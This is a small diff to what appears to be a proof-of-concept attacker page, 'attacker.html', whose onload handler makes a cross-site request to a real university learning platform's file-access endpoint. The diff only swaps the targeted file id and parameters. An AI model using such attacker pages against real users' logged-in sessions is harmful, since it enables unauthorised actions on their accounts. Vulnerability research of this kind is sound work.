--- a/src/poc/attacker.html
+++ b/src/poc/attacker.html
@@ -24,7 +24,7 @@
     }
     
     onload = () => {
-      get('https://learn.tsinghua.edu.cn/f/wlxt/kc/wj_wjb/student/beforePlay?sfgk=0&wjid=2006990066_KJ_165772165763066d4475013-ae14-47a2-b508-8b0569e8d532&mk=mk_kcwj&pageType=all&browser=-1');
+      get('https://learn.tsinghua.edu.cn/f/wlxt/kc/wj_wjb/student/beforePlay?wjid=2021012864_GG_1647272913680292269eba8-1aa3-4e86-a1bc-e69592addc4a&mk=mk_kcgg&sfgk=0&browser=-1');
     }
   </script>
 </head>
